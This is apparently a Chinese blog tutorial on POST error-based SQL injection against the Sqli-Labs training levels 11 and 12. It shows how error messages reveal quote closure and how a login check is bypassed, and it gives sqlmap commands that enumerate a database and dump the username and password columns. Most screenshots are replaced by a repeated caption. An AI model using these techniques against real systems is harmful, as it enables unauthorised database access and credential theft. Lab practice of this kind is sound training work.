sql POST基于错误的注入

这里面 需要用到的工具是   Burp Suite  这款 优秀的抓包工具   然后还有sqlmap 等等  

抓包的教程  有很多 这里就不一一叙述了 

我们先来看一下 11这个关卡 

sql POST基于错误的注入

 然后 这里  可以直接输入 看返回结果 比如 

sql POST基于错误的注入

也可以 截取 数据包  然后用  

 

sql POST基于错误的注入

来发送    其中呢   我们可以 通过报错信息来猜测闭合的信息   

比如 我们输入了 是 admid\    报错是    123456'  limit 0,1  那么  

我们可以 推测  这个的信息  是 

select  name,password from admin  where name='xxxx'  and password ='xxxx'

其中 我们的 \   把 xxxx 后面的  '给转译成 正常的字符  那么  是由  password 第一个'来闭合的  那么 后面的 123456’自然的就报错了  那么 这里我们就有很多要写的东西了

我们直接 这样 

sql POST基于错误的注入

构造了一个闭合   就直接 可以显示出来了   正确的

然后我们看 12 

sql POST基于错误的注入  

 这里的报错是   “123456\”  那么 

sql POST基于错误的注入

我们可以 构造闭合 

sql POST基于错误的注入

登陆成功@!!!

然后就是 就   用sqlmap 跑程序 

首先把数据包复制下来

sql POST基于错误的注入

然后 用sqlmap 跑一下

 

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E --current-db --batchsql POST基于错误的注入

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -D security --tables --batch 

sql POST基于错误的注入

py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users --columns --batch

sql POST基于错误的注入 py -2  sqlmap.py -r  C:\Users\Lenovo\Desktop\flag.txt -p uname --technique E -T users -C'username,password' --dump  --batch

 

sql POST基于错误的注入

上一篇:bat常用命令


下一篇:Sqli-Labs Less12:POST注入